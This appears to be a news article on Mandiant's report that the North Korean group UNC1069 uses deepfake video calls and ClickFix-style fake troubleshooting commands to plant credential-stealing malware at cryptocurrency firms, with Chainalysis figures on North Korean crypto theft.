Google's cybersecurity firm Mandiant has issued a stark warning about a significant escalation in North Korean cyberattacks targeting the cryptocurrency industry. State-sponsored hackers are now employing artificial intelligence-generated deepfakes and fake video meetings as part of highly sophisticated social engineering campaigns aimed at stealing digital assets.
The report details a specific intrusion at a fintech company attributed to UNC1069, also known as "CryptoCore," a threat actor linked with high confidence to North Korea. The attack chain began with the victim being contacted on Telegram by a compromised account impersonating a known cryptocurrency executive. After building rapport, the attacker sent a Calendly link for a meeting, directing the victim to a fake Zoom call hosted on the group's own infrastructure.
During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO. The attackers claimed audio problems and instructed the victim to run "troubleshooting" commands—a technique known as ClickFix—which triggered a malware infection. Forensic analysis identified seven distinct malware families deployed to harvest credentials, browser data, and session tokens for financial theft and future impersonation.
Mandiant stated that UNC1069 is targeting corporate entities and individuals within the cryptocurrency sector, including software firms, developers, venture capital firms, and their employees or executives. This warning comes as North Korea's crypto thefts continue to grow. Blockchain analytics firm Chainalysis reported that North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total stolen by DPRK-linked actors now stands at roughly $6.75 billion.
"The effectiveness of this approach comes from how little has to look unusual," said Fraser Edwards, CEO of decentralized identity firm cheqd. "The sender is familiar. The meeting format is routine... Trust is leveraged before any technical defence has a chance to intervene." Edwards warned that the risk will increase as AI agents are integrated into everyday communication, potentially automating deepfake deployment and turning impersonation into a scalable process.
Experts emphasize that this evolution represents a dangerous new frontier, exploiting the trust inherent in remote work and digital collaboration. The industry faces unprecedented threats that erode fundamental trust and may lead to stricter regulatory security mandates and increased operational costs for companies across the cryptocurrency ecosystem.
